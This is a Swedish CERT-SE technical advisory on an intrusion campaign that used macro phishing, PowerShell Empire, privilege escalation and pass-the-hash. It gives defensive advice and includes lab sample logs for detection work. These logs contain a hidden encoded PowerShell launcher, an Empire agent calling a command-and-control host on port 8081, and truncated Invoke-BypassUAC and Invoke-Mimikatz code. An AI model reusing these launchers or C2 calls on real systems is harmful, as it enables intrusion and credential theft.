Uppdaterad | Publicerad
CERT-SE tekniska råd med anledning av det aktuella dataintrångsfallet (B 8322-16)
CERT-SE kommer att uppdatera denna sida när vi får ny samt relevant information.
Senaste uppdatering var: 2017-09-18
CERT-SE tar tacksamt emot information om fungerande skyddsåtgärder mot eller detektering av denna typ av angrepp (dock inte om åtgärderna innefattar inköp av specifika produkter) på cert@cert.se
Sammanfattning
En stor andel av de it-angrepp som görs mot myndigheter, företag eller andra organisationer inleds av ett mejl med ett bifogat Office-dokument. Detta dokument kan exempelvis innehålla skadlig kod eller ett makro avsett att infektera mottagarens dator. Att skicka ett preparerat, skadligt dokument till ett tilltänkt offer via mejl är för en angripare en attraktiv metod då arbetsinsatsen är relativt liten ställt mot den potentiellt höga utdelningen.
Detta tillvägagångssätt var det som användes i det aktuella fallet, för att sedan röra sig vidare på nätverket.
Drabbade organisationer och privatpersoner
De drabbade har så långt som möjligt informerats av polisen. Den infrastruktur som angriparen använt är nedstängd och vi kommer därför inte ha med traditionella IOC:er i den här texten.
Angriparens tillvägagångssätt
De utförda angreppen inleddes vanligen med kartläggning av e-postadresser till anställda på den organisation som valts ut som mål. Ett eller flera mejl innehållande ett preparerat Microsoft Office-dokument skickades sedan till de anställda. Dessa mejl skickades från kapade mejlkonton eller från domäner avsedda att efterlikna legitima organisationer. Angriparen uppmanade mottagaren att tillåta makron för att kunna läsa det bifogade dokumentet. När detta skett, exekverades ett dolt PowerShell-skript vilket gav tillgång till offrets dator. Dokumenten skapades med allmänt tillgängliga verktyg för penetrationstestning (såsom Metasploit och PowerShell Empire). Efter att ha fått fotfäste i systemet använde angriparen verktyg för att öka sina rättigheter i systemet. Detta i syfte att kunna flytta sig från maskin till maskin i nätverket, dumpa lösenord och för att kunna komma åt för ändamålet intressanta system och data.
Vi har lämnat mer detaljerad information om tillvägagångsättet till polisen och den är en del av förundersökningen
Skydd och detekteringsråd per teknikområde
- Makron
- PowerShell
- Nätverkstrafik
- Antivirus
- Lateral movement samt privilegie-eskalering
- RDP
- Multi-faktor autentisering
- Annan relevant information
Makron
Att generellt, genom tekniska policyinställningar som genom Group Policys i Microsoft-miljöer kontrollera eller begränsa makron i dokument kan vara komplicerat. Många företag och organisationer använder makron i dokument för legitima arbetsuppgifter och de flesta åtgärder för att kontrollera dessa riskerar att påverka verksamheten. Inaktiverade makron kan förhindra att arbete utförs på ett effektivt sätt samt kan eventuellt skapa en negativ bild av implementerade säkerhetslösningar. Att endast tillåta makron vilka är signerade av organisationen kan vara en lösning men även i dessa fall behövs ofta undantag kunna göras när dokument skickas från externa avsändare. Vilka konkreta åtgärder som kan tas i bruk för att förbättra säkerheten runt makron varierar beroende på vilka krav verksamheten har.
I alla nyare versioner av Office finns säkerhetsinställningar för när makron får köras eller inte. Standardinställningen är att makron är inaktiverade och att användaren får en notifiering och ett val där denne kan välja att exekvera makrot eller inte. Beslutet om att köra ett potentiellt skadligt makro blir då helt upp till mottagarens bedömning och förmåga att skilja ett skadligt dokument från ett legitimt.
Några grundläggande säkerhetsåtgärder som kan minska risken för skadliga makron kan vara:
-
Om möjligt – inaktivera makron.
Om verksamheten inte kräver makron kan möjligheten att exekvera dessa inaktiveras utan möjlighet för enskilda användare att göra undantag. I många organisationer används dock regelbundet makron. -
Informera återkommande användare om riskerna.
Angrepp utförda genom skadliga makron bygger generellt på att mottagaren själv i stunden avgör om ett makro får köras eller inte. Därför kan en grundläggande säkerhetsåtgärd i form av återkommande information till användare om riskerna med skadliga makron vara en bra åtgärd. -
Implementera en säkerhetslösning för att skanna mejl och bilagor efter skadlig kod både internt och externt samt att införa en rutin för att regelbundet följa upp loggar.
-
Signerade Makron
-
Implementera en säkerhetslösning lokalt på användarnas datorer vilken kan uppfatta och blockera exekvering av skadlig kod. Även om antivirus-produkter ej kan fånga all skadlig kod så kan rätt produkt minska risken för att drabbas påtagligt.
Mer information här:
https://support.office.com/en-us/article/Enable-or-disable-macros-in-Office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6
https://technet.microsoft.com/en-us/library/cc179176.aspx
https://technet.microsoft.com/en-us/library/ff400327.aspx
https://technet.microsoft.com/en-us/library/ee857085.aspx
https://technet.microsoft.com/en-us/library/cc545900.aspx
https://technet.microsoft.com/en-us/library/cc178971.aspx
Exempel på dokument med skadligt makro. Det enda som behövs för att angreppet skall starta är att användaren lyder uppmaningen och klickar på "Aktivera innehåll"
PowerShell
PowerShell
Sedan runt 2012 har användandet av Microsofts skriptspråk PowerShell som verktyg vid it-angrepp konstant ökat. PowerShell har av Microsoft utvecklats till att vara en mycket kraftfullt skriptspråk avsett att administrera samtliga Windows-system. PowerShell kan exekvera dynamisk kod, nedladdad från ett annat system i minnet på den angripna datorn - utan att någon gång behöva lagras på disk. PowerShell kan även exekvera .Net-kod.
Ett vanligt problem vid utredning av intrång där PowerShell använts av angriparen är avsaknad av loggar. Med standardinställningar lämnar PowerShell i de flesta Windows-installationer få artefakter och försvårar därför påtagligt en forensisk undersökning. Enligt statistik från företaget NetMarketShare från Augusti 2017 så är Windows 7 fortfarande det mest använda operativsystemet från Microsoft. Windows 7 / Server 2008 inkluderar PowerShell version 2.0, denna version loggar som standard endast att PowerShell har körts, hur länge sessionen pågick samt om den initierades lokalt eller från en annan dator. Den bästa lösningen för detta är att uppgradera PowerShell.
Åtgärder för att få bättre kontroll över PowerShell:
-
Uppgradera PowerShell till senaste version (i skrivande stund version 5.0) och Se över de alternativ som som finns för att att logga och säkra PowerShell. Windows 7/2008 och nyare versioner av Windows har stöd för PowerShell 5.0 vilket ger större möjlighet till loggning och kontroll av PowerShell, detta kräver dock i de flesta fall en manuell uppgradering. En stark rekommendation är därför att uppgradera samtliga PowerShell-installationer till senaste version samt att konfigurera loggning. Skapa även en rutin för att regelbundet följa upp loggarna.
Mer information om loggning av PowerShell kan läsas här: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html -
Implementera en central log- och övervakningslösning, vanligen benämnd som SIEM, Security Information and Event Management. En sådan lösning underlättar avsevärt möjligheten att följa upp möjliga angrepp riktade mot så väl klientdatorer som servrar och annan infrastruktur. Skapa och upprätthåll även rutiner för att regelbundet kontrollera dessa loggar.
-
Se över lösningar för att kontrollera exekvering och användning av PowerShell.
-
Att inaktivera PowerShell är i allmänhet inte ett alternativ då detta med stor sannolikhet ger problem med existerande programvara och annan funktionalitet. Ett alternativ kan vara att se över de programvaror som finns tillgängliga vilka kan ge stöd för bättre kontroll PowerShell, exempelvis genom svartlistning av specifika processer vilka inte ges tillgång till PowerShell.
-
Konfigurera windows-brandväggen till att förbjuda powershell-binären (powershell.exe, obs kan finnas multipla) från extern kommunikation
Mer information om PowerShell här:
https://blogs.msdn.microsoft.com/powershell/2013/12/16/powershell-security-best-practices/
https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
https://adsecurity.org/wp-content/uploads/2016/05/BSidesCharm-2016-PowerShellSecurity-Defending-the-Enterprise-from-the-Latest-Attack-Platform-FINAL.pdf
https://adsecurity.org/?p=2921
- Exempel PowerShell-loggar
Nätverkstrafik
Angriparen har i de flesta fall använts sig utav icke-standardiserade TCP-portar och det är därför möjligt att filtrera bort "normala" portar samt undersöka de som blir kvar. Det här kan göras proaktivt i brandvägg som skydd eller reaktivt genom analys av trafikflöden för detektering.
Exempel på TCP-portar som använts 444, 4444, 4488, 4443 samt 8081. En annan metod som kan användas på intern trafik för att detektera "lateral movement" är att sortera ut flöden som bryter mot det normala, till exempel klienter som kommunicerar med andra klienter.
NIDS (snort/suricata)
Exempel på signatur-träff i våran labbmiljö (emerging threat rules)
09/14/2017-10:40:22.953854 [] [1:2021616:2] ET TROJAN PSEmpire Checkin via POST [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 195.200.72.148:50652 -> 37.28.155.22:8081
09/14/2017-10:41:28.776886 [] [1:2021616:2] ET TROJAN PSEmpire Checkin via POST [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 195.200.72.148:50689 -> 37.28.155.22:8081
09/14/2017-10:36:20.794874 [] [1:2021616:2] ET TROJAN PSEmpire Checkin via POST [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 195.200.72.148:50534 -> 37.28.155.22:8081
09/14/2017-10:41:03.545077 [] [1:2021616:2] ET TROJAN PSEmpire Checkin via POST [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 195.200.72.148:50671 -> 37.28.155.22:8081
- Exempel Nätversktrafik
Antivirus
Vid ett flertal tillfällen vi har analyserat har det lokala antivirusprogrammet detekterat vissa av de nerladdade verktygen (exe-filer). Vi rekommenderar därför att använda antivirusprogram, hålla det uppdaterat samt monitorera information som det genererar.
Lateral movement samt privilegie-eskalering
Lateral Movment
”Pass the Hash” (PtH) är en teknik för att autentisera sig med lösenordshashen i stället för med själva lösenordet. Från början användes NTLM eller LAN Manager-hashar men tekniken har utvecklats till att även innefatta Kerberos-biljetter, i dessa fall kallas tekniken ”Pass the Ticket” (PtT).
Attacken handlar om att dumpa cachade lösenordshashar eller Kerberos-biljetter ur minnet på en redan hackad maskin och sedan använda detta för vidare inloggning på andra maskiner i miljön, detta beskrivs vanligen som ”Lateral Movement”.
Attacken förutsätter att angriparen redan fått fotfäste på en maskin och därmed har flera säkerhetsåtgärder redan förbigåtts. Men det finns även i detta läge motåtgärder för vidare intrång.
Vilket skydd som finns mot PtH och PtT varierar bland annat beroende av Windows-version men några grundläggande motåtgärder listas nedan:
-
Var restriktiv med privilegierade domänkonton och använd inte dessa på maskiner som inte är särskilt uppsatta för ändamålet. Separera användandet av dessa konton från användarkonton både gällande var och hur dom används (inte på en vanlig arbetsstation med surfaccess t.ex.).
-
Konfigurera alla konton med hög behörighet i Active Directory som “sensitive and cannot be delegated”.
https://blogs.technet.microsoft.com/poshchap/2015/05/01/security-focus-analysing-account-is-sensitive-and-cannot-be-delegated-for-privileged-accounts/ -
Låt inte användarkonton få administratörsrättigheter då detta kan användas för att dumpa lösenordshashar ur minnet på en hackad maskin.
-
Använd managementverktyg som inte sparar cachade inloggningsuppgifter i maskiners minne vid fjärradministration.
-
Använd inte LAN Manager-hashar i maskiners lokala SAM eller i Active Directory domändatabas.
-
Förhindra ”lateral movement” på ett nätverk genom att blockera inkommande trafik i brandväggen förutom där det behöver vara explicit tillåtet (t.ex. från helpdesk eller management servrar).
-
Använd "Restricted Admin mode" för Remote Desktop för att förhindra
att lösenordshashar sparas i minnet på destinationen.
https://social.technet.microsoft.com/wiki/contents/articles/32905.how-to-enable-restricted-admin-mode-for-remote-desktop.aspx
https://digital-forensics.sans.org/blog/2014/11/13/protecting-privileged-domain-accounts-restricted-admin-and-protected-users
RDP
RDP är Microsofts inbyggda fjärrstyrning. I de fall RDP har varit tillåtet har angriparen använt det för "lateral movement" efter att ha tillförskansat sig användarnamn och lösenord. Agenten (boten) har etablerat en tunnel som gör att RDP-trafik har kunnat passera organisationens brandvägg. Konceptet att återanvända det som redan finns installerat brukar ofta kallas "living off the land".
- Exempel RDP-loggar
Multi-faktor autentisering
Då angriparen i minst ett av fallen vi undersökt har kommit över och använt sig av ett legitimt VPN-konto vill vi rekomendera att samtliga Internettjänster där så är möjligt använder sig av multi-faktor autentisering. Till exempel VPN och webbmejl.
https://en.wikipedia.org/wiki/Multi-factor_authentication
Annan relevant information
Här har vi samlat annan information som är relevant för att detektera eller skydda sig mot den här typen av angrepp.
WMI
https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html
PowerShell
https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
http://www.redblue.team/2015/09/triaging-powershell-exploitation-with.html
Lateral movement
https://technet.microsoft.com/en-us/dn785092.aspx (lateral movement, pth)
Vårat labb
Bygger på instruktioner här: https://adsecurity.org/?p=2653 men är vidare utformat efter en av de drabbade organisationerna för att ge realistiska scenarion.
Exempel PowerShell-loggar
Samtliga loggar är skapade i våran labbmiljö men efterliknar så långt som möjligt de verkliga dataintrången.
Log Name: Windows PowerShell
Source: PowerShell <--
Date: 2017-09-13 12:42:55
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: pongo.hominidae.org
Description:
Provider "Registry" is Started.
Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=1
HostName=ConsoleHost
HostVersion=5.0.10240.16384
HostId=40450d09-ea1c-4173-a6a9-10129da4d73f
<-- Base64-kodat powershell-skript
HostApplication=powershell -NoP -sta -NonI -W Hidden -Enc JABXAEMAPQBOAGUAVwAtAE8AQgBqAEUAQwBUACAAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABJAGUAbgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEA(truncated)...
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Log Name: Windows PowerShell
Source: PowerShell <---
Date: 2017-09-13 12:42:57
Event ID: 800
Task Category: Pipeline Execution Details <--
Level: Information
Keywords: Classic
User: N/A
Computer: pongo.hominidae.org
Description:
<-- Powershell-Empire-Agent
Pipeline execution details for command line: fuNCtioN STARt-NeGOtIATE{param($s,$SK,$UA="lol")ADd-TYPe -aSSembly SYSTEM.SEcURITy;Add-TypE -AsSEMBLY SYstem.COre;$ErrorActionPreference = "SilentlyContinue";$E=
(truncated)...
Start-Negotiate -s "http://37.28.155.22:8081/" -SK 't[$pE{.|DynG}#%@&u1o?(U4Sgskw`_v' -UA $u;.
Context Information:
DetailSequence=1
DetailTotal=1
SequenceNumber=15
UserId=HOMINIDAE\apan.apansson
HostName=ConsoleHost
HostVersion=5.0.10240.16384
HostId=40450d09-ea1c-4173-a6a9-10129da4d73f
HostApplication=powershell -NoP -sta -NonI -W Hidden -Enc JABXAEMAPQBOAGUAVwAtAE8AQgBqAEUAQwBUACAAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABJAGUAbgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABh(truncated)...
EngineVersion=5.0.10240.16384
RunspaceId=3f268116-7d77-441e-b766-18bae86a262c
PipelineId=1
ScriptName=
CommandLine=fuNCtioN STARt-NeGOtIATE{param($s,$SK,$UA="lol")ADd-TYPe -aSSembly SYSTEM.SEcURITy;Add-TypE -AsSEMBLY (truncated)
Start-Negotiate -s "http://37.28.155.22:8081/" -SK 't[$pE{.|DynG}#%@&u1o?(U4Sgskw`_v' -UA $u;
Details:
CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="AssemblyName"; value="SYSTEM.SEcURITy"
Log Name: Windows PowerShell
Source: PowerShell <--
Date: 2017-09-13 12:51:26
Event ID: 600
Task Category: Provider Lifecycle
Level: Information
Keywords: Classic
User: N/A
Computer: pongo.hominidae.org
Description:
Provider "Registry" is Started.
Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=1
HostName=MSFConsole <--
HostVersion=0.1
HostId=500e57c5-f16a-4901-b401-1f3413ea3b46
HostApplication=TEST.exe <-- EXE-fil som körs via powershell
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Log Name: Microsoft-Windows-PowerShell/Operational <--
Source: Microsoft-Windows-PowerShell
Date: 2017-09-13 12:42:57
Event ID: 4104
Task Category: Execute a Remote Command
Level: Warning
Keywords: None
User: HOMINIDAE\apan.apansson
Computer: pongo.hominidae.org
Description:
<-- Powershell-Empire-Agent
Creating Scriptblock text (1 of 1):
fuNCtioN STARt-NeGOtIATE{param($s,$SK,$UA="lol")ADd-TYPe -aSSembly SYSTEM.SEcURITy;Add-TypE -AsSEMBLY SYstem.COre;(truncated)...
Start-Negotiate -s "http://37.28.155.22:8081/" -SK 't[$pE{.|DynG}#%@&u1o?(U4Sgskw`_v' -UA $u;
ScriptBlock ID: b994a9d4-7f3c-46b8-8cf4-8f36d7f2312f
Path:
Log Name: Microsoft-Windows-PowerShell/Operational <--
Source: Microsoft-Windows-PowerShell
Date: 2017-09-13 12:42:58
Event ID: 4104
Task Category: Execute a Remote Command
Level: Warning
Keywords: None
User: HOMINIDAE\apan.apansson
Computer: pongo.hominidae.org
Description:
Creating Scriptblock text (1 of 3):
<-- (starten på) Invoke-Empire
function Invoke-Empire {
param(
[Parameter(Mandatory=$true)]
[String]
$SessionKey,
(truncated)...
()).TransformFinalBlock($bytes, 0, $bytes.Length);
$hmac = New-Object System.Security.Cryptography.HMACSHA1;
$hmac.Key = $encoding.GetBytes($SessionKey);
$ciphertext + $hmac.Com
ScriptBlock ID: 75618e4c-39a1-4261-b5eb-2cb1ec923c20
Path:
Log Name: Microsoft-Windows-PowerShell/Operational <--
Source: Microsoft-Windows-PowerShell
Date: 2017-09-13 12:54:38
Event ID: 4104
Task Category: Execute a Remote Command
Level: Warning
Keywords: None
User: HOMINIDAE\apan.apansson
Computer: pongo.hominidae.org
Description:
Creating Scriptblock text (1 of 33):
<-- (starten på) Invoke-BypassUAC (privesc)
function Invoke-BypassUAC
{
[CmdletBinding()]
param(
[Parameter(Mandatory = $False)]
[string]
(truncated)...
+gJihABCD4A/rAjPAD76EwbihABBqB8H4BFmJhYz9//87wQ+HIAoAAP8khaU0ABCDjej9////ibWI/f//ibW8/f//ibXI/f//ibXM /f//ibXw/f/
ScriptBlock ID: f62ebd67-1727-45d2-aa63-b1678ce35f47
Path:
Log Name: Microsoft-Windows-PowerShell/Operational <--
Source: Microsoft-Windows-PowerShell
Date: 2017-09-13 12:56:04
Event ID: 4104
Task Category: Execute a Remote Command
Level: Warning
Keywords: None
User: HOMINIDAE\apan.apansson
Computer: pongo.hominidae.org
Description:
Creating Scriptblock text (1 of 73):
<-- (starten på) Invoke-Mimikatz (lösenordsdump)
function Invoke-Mimikatz
{
[CmdletBinding(DefaultParameterSetName="DumpCreds")]
Param(
[Parameter(Position = 0)]
(truncated)...
$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_sp', [UInt16], 'Public') |
ScriptBlock ID: e72fb473-50ca-4853-8450-9f376bfabfb4
Path:
Exempel Nätversktrafik
Samtliga loggar är skapade i våran labbmiljö men efterliknar så långt som möjligt de verkliga dataintrången.
Denna "logg" är en follow_tcp_flow i wireshark mellan en installerad agent (bot) och den emulerade angriparens command & control.
GET /index.asp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 37.28.155.22:8081
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: Microsoft-IIS/7.5
Date: Thu, 14 Sep 2017 08:21:14 GMT
2.j.1.A2d*:&.W..c.^;Vi.Q(....
wR.w.#.W
).DL+.O.ig1uBkQ.QsJ.8..2..".#.(z. W=..Vw r.
.{Lx`*76KZ!,%.6F<<[}%7-+
S`J.cN.*MZ:F.........=A. .M.dDNe.JI%H.].|G;@: ..U[{.I.w)6/K1j-+?
`.e:U&Qo..i& (>)dR5.wM.>yQ.;$..w.._.e*R..Q.2!.#9q5&"t.
.|=417i<fV.t.A;P{0f%.0.'2..=.a"~_g*dDN..zq%{U.A..`.s.S,2.r$5.@?([.?+, 3]..{.4t<.e:P6ZQ(5#}MT.e5.Ue.=DJ"Sd@4d.E
L.qg.NHKS!.%Z.rPx[
5.BJ$.S.}.;t..g7^6$.K$9,"1.
# 8[.
7i>Q\0r.v=~X=m}$..'.
.9>P.7(.X'*.i;od.UU.O.K&D}!.
...[.4VP.(W....i.FF5T.e..k.M.3<.%..>-ug..+\3.0*".ei!a.lU.}.q.&0.>.:=1"w$
kG`+.g@.k%QX~-UM6`s4
.#..X'>G...Z.j:..
WJ't4a'F..g.$.2'4.%1 r.&.~.+/'.8Q.mg'V.Rm.@.. .WRoBLw..6..X62Sc.p..I-|#l|']. [O1!..1r.T7F.RjHX;;lW.G6YBpJ.q0..,.4r$5.@.([.1%.NuK^.do1.G.i.w."5,?+.;:.v#..x+. 4vO..u.B V.sqf.G^!.)1VS|
Ka2LA`<@.8WG.r.bG.Z..hC. JD. _.e5.Um..8..8mF2..E m.|..5.%.&....m...l0+.%oYJGl.Y..}..Q...#^[6.\vj..[
..P.c
@..c...]B.w'G.2....Z.a$k,k..5'".w.dQ..?MG
msZS0$.,.16
>...+!;<",V`.r(.UxM!g
....7..$)k(.S.G`.-i-qj8.[r.zL.Z'...$@bV/.].1>cR
.:i>Q@.c;E.~d.U0..6MZ..2.Q.18|. . 3.bi.....\..Q2....N...s.%6.\Q...) . ds4.T._6.......,X5?@Xg8A./..eQ.v.u&x qa. w.7I^[{..,.T2..)4..&.gD4G]...
<Z7..E../TXyt?./.P`..nF.a..QtAxM!g..:.0H{..u`.. W,0QJ5.T d`4]<z.|.w.....bR...@kU.!dT.(4m.g.Qz
f.qP6<B[YN{21uH5..Z..YC-.Jk`.R
K~m. ."$F8"..7/.#<(z9)W=.>vW)R,.,MQ.@<..*'..X5>W3."^(+*+5.jf.v'^.vl.FhC:=W].-."P5.[.RjK[r]_..c..=~F. {>G^.8...Tj.Ka:k/j4.#....d6.T...q.I8..]{.Z.A...Z.7QJ,.Z.{.Qp*l..bsZSO>6dR.f.#n\R[o"+)+JW.h.T!Kuo...693/27.5j.... [8^E.8MS)T:_.zf!ii]&..2.79..W9\.'..8./lK-c;E2...u0/:....;.`..xSI.)0N..M.ry;t.hG.....;#.-5.5B... \=0.!).tM.t.JK`..d.#..23,...A. 8Z\i<.7.mA`o%p+{z0g NHO...KT._T1)[.y]..M~.d@4].Z.qd.<W.Y,:83.LPh7z\r$U.;..do%.BPZu...].%).^]{ .4[ [mY.c4s.g.[.A..e..\W.\]}
P2TR~_gWy^.`V.b.RXf.Vg.^..'K ).EF.k..)o.-.)..Pq%K\.!~e.. 7...Hx
Sr.@.@G.lQ5..UL2I.\
Q\..i2....>..r
$*7A.!.Fn].@1.WB.L\0YqN.O.KbQ..V. \S.(
.g..L`
H.MC
u.{< ...-.."
7.@.- .+StL.B.F.oZ<Z0..
.=.-'>G.7.Z.j)...@L0G..8VF1[$.:...+.."yJ.<K....5.MQh.\.&La;f<..C,3:..)M.<U~.-.
.
BInq._.P_&v&...>.
..>yPg:J.-..4 QD4I..FB.. .4
8#%.X02E..4}.
:=i-qJ.C&b2...q'$.9%%1.$ k...}TmBJ.V..<.^...x.[...89!2._|XWn_`R
.Uc...}.RMH..u..4%..3.9..e. ..,./...Jj..8p%PZn.:.AVS.q.. /F)1.}T`0G|Yfgr.Qx9...q.I092!+.1.g"..Z36QGi)qd.U.^.Rn<Z2+1...4^P.fBiK.X-.\i1fk'R=.T._6.......,X5?@Xg.].6T/ .MQb
Qd...qF2.NO..q#.7K.!?O.%QJ4V.L.B.IAO@%..E#$$4}ZP>FBl@
=.*S .t..D?t,k..M 36&Y3.5. m..Um.. .(.qd.N,..Z{.f
..$$.
..8A 7.X. <<|Yb`..8^.Z.ww.$QPS) VI{....uLjW_r ...c&.$zQh.6I4.#"&..(.T.>wU.]/..
l..H.Kv~n}.?SO_;..'/A=k/K..W+).LA H.lU.i.w..],.4.".2J7m[
T`8+.S`w.G.T+Zk.M#3.9_Iq"&.j...\1.. &.ai.e>.KmI.obQ]ES2>!Z.a>./F!hIBc.brnj0_(K`x.eNZB^[{71..T..b..]=u@.K5J9
Khkh.=.?.LD:4Ff..0.BG`+/.@.K5J9
Kv~h.=2?'LD..I.J. 7.X-DJ)(OI{..s]...A?.H00#.LN.k.).M(lPU..UJ+CXt.OA'QsJ ...:..{dXm_]\i
.+.W.b W.4..{..G^.. 1VVt.YeV}.7
.(.h@9.QZ
F.xg6......2T.m4eVk.+..gYFU/E.
..{!U!.^%..0..:P.eV]\f..3
.
o.B.]..d.fIAYMXoNEt.Ph(e\c
5c
f^nZ1H.xUv..A.Z._w#@.C...N#2^Nj(b.dSNGET /index.asp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 37.28.155.22:8081
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: Microsoft-IIS/7.5
Date: Thu, 14 Sep 2017 08:21:14 GMT
2.j.1.A2d*:&.W..c.^;Vi.Q(....
wR.w.#.W
).DL+.O.ig1uBkQ.QsJ.8..2..".#.(z. W=..Vw r.
.{Lx`*76KZ!,%.6F<<[}%7-+
S`J.cN.*MZ:F.........=A. .M.dDNe.JI%H.].|G;@: ..U[{.I.w)6/K1j-+?
`.e:U&Qo..i& (>)dR5.wM.>yQ.;$..w.._.e*R..Q.2!.#9q5&"t.
.|=417i<fV.t.A;P{0f%.0.'2..=.a"~_g*dDN..zq%{U.A..`.s.S,2.r$5.@?([.?+, 3]..{.4t<.e:P6ZQ(5#}MT.e5.Ue.=DJ"Sd@4d.E
L.qg.NHKS!.%Z.rPx[
5.BJ$.S.}.;t..g7^6$.K$9,"1.
# 8[.
7i>Q\0r.v=~X=m}$..'.
.9>P.7(.X'*.i;od.UU.O.K&D}!.
...[.4VP.(W....i.FF5T.e..k.M.3<.%..>-ug..+\3.0*".ei!a.lU.}.q.&0.>.:=1"w$
kG`+.g@.k%QX~-UM6`s4
.#..X'>G...Z.j:..
WJ't4a'F..g.$.2'4.%1 r.&.~.+/'.8Q.mg'V.Rm.@.. .WRoBLw..6..X62Sc.p..I-|#l|']. [O1!..1r.T7F.RjHX;;lW.G6YBpJ.q0..,.4r$5.@.([.1%.NuK^.do1.G.i.w."5,?+.;:.v#..x+. 4vO..u.B V.sqf.G^!.)1VS|
Ka2LA`<@.8WG.r.bG.Z..hC. JD. _.e5.Um..8..8mF2..E m.|..5.%.&....m...l0+.%oYJGl.Y..}..Q...#^[6.\vj..[
..P.c
@..c...]B.w'G.2....Z.a$k,k..5'".w.dQ..?MG
msZS0$.,.16
>...+!;<",V`.r(.UxM!g
....7..$)k(.S.G`.-i-qj8.[r.zL.Z'...$@bV/.].1>cR
.:i>Q@.c;E.~d.U0..6MZ..2.Q.18|. . 3.bi.....\..Q2....N...s.%6.\Q...) . ds4.T._6.......,X5?@Xg8A./..eQ.v.u&x qa. w.7I^[{..,.T2..)4..&.gD4G]...
<Z7..E../TXyt?./.P`..nF.a..QtAxM!g..:.0H{..u`.. W,0QJ5.T d`4]<z.|.w.....bR...@kU.!dT.(4m.g.Qz
f.qP6<B[YN{21uH5..Z..YC-.Jk`.R
K~m. ."$F8"..7/.#<(z9)W=.>vW)R,.,MQ.@<..*'..X5>W3."^(+*+5.jf.v'^.vl.FhC:=W].-."P5.[.RjK[r]_..c..=~F. {>G^.8...Tj.Ka:k/j4.#....d6.T...q.I8..]{.Z.A...Z.7QJ,.Z.{.Qp*l..bsZSO>6dR.f.#n\R[o"+)+JW.h.T!Kuo...693/27.5j.... [8^E.8MS)T:_.zf!ii]&..2.79..W9\.'..8./lK-c;E2...u0/:....;.`..xSI.)0N..M.ry;t.hG.....;#.-5.5B... \=0.!).tM.t.JK`..d.#..23,...A. 8Z\i<.7.mA`o%p+{z0g NHO...KT._T1)[.y]..M~.d@4].Z.qd.<W.Y,:83.LPh7z\r$U.;..do%.BPZu...].%).^]{ .4[ [mY.c4s.g.[.A..e..\W.\]}
P2TR~_gWy^.`V.b.RXf.Vg.^..'K ).EF.k..)o.-.)..Pq%K\.!~e.. 7...Hx
Sr.@.@G.lQ5..UL2I.\
Q\..i2....>..r
$*7A.!.Fn].@1.WB.L\0YqN.O.KbQ..V. \S.(
.g..L`
H.MC
u.{< ...-.."
7.@.- .+StL.B.F.oZ<Z0..
.=.-'>G.7.Z.j)...@L0G..8VF1[$.:...+.."yJ.<K....5.MQh.\.&La;f<..C,3:..)M.<U~.-.
.
BInq._.P_&v&...>.
..>yPg:J.-..4 QD4I..FB.. .4
8#%.X02E..4}.
:=i-qJ.C&b2...q'$.9%%1.$ k...}TmBJ.V..<.^...x.[...89!2._|XWn_`R
.Uc...}.RMH..u..4%..3.9..e. ..,./...Jj..8p%PZn.:.AVS.q.. /F)1.}T`0G|Yfgr.Qx9...q.I092!+.1.g"..Z36QGi)qd.U.^.Rn<Z2+1...4^P.fBiK.X-.\i1fk'R=.T._6.......,X5?@Xg.].6T/ .MQb
Qd...qF2.NO..q#.7K.!?O.%QJ4V.L.B.IAO@%..E#$$4}ZP>FBl@
=.*S .t..D?t,k..M 36&Y3.5. m..Um.. .(.qd.N,..Z{.f
..$$.
..8A 7.X. <<|Yb`..8^.Z.ww.$QPS) VI{....uLjW_r ...c&.$zQh.6I4.#"&..(.T.>wU.]/..
l..H.Kv~n}.?SO_;..'/A=k/K..W+).LA H.lU.i.w..],.4.".2J7m[
T`8+.S`w.G.T+Zk.M#3.9_Iq"&.j...\1.. &.ai.e>.KmI.obQ]ES2>!Z.a>./F!hIBc.brnj0_(K`x.eNZB^[{71..T..b..]=u@.K5J9
Khkh.=.?.LD:4Ff..0.BG`+/.@.K5J9
Kv~h.=2?'LD..I.J. 7.X-DJ)(OI{..s]...A?.H00#.LN.k.).M(lPU..UJ+CXt.OA'QsJ ...:..{dXm_]\i
.+.W.b W.4..{..G^.. 1VVt.YeV}.7
.(.h@9.QZ
F.xg6......2T.m4eVk.+..gYFU/E.
..{!U!.^%..0..:P.eV]\f..3
.
o.B.]..d.fIAYMXoNEt.Ph(e\c
5c
f^nZ1H.xUv..A.Z._w#@.C...N#2^Nj(b.dSN
"PCAP or it didn't happen"https://drive.google.com/open?id=0B7pTM0QU5apSdnF0Znp1Tko0ams
Exempel RDP-loggar
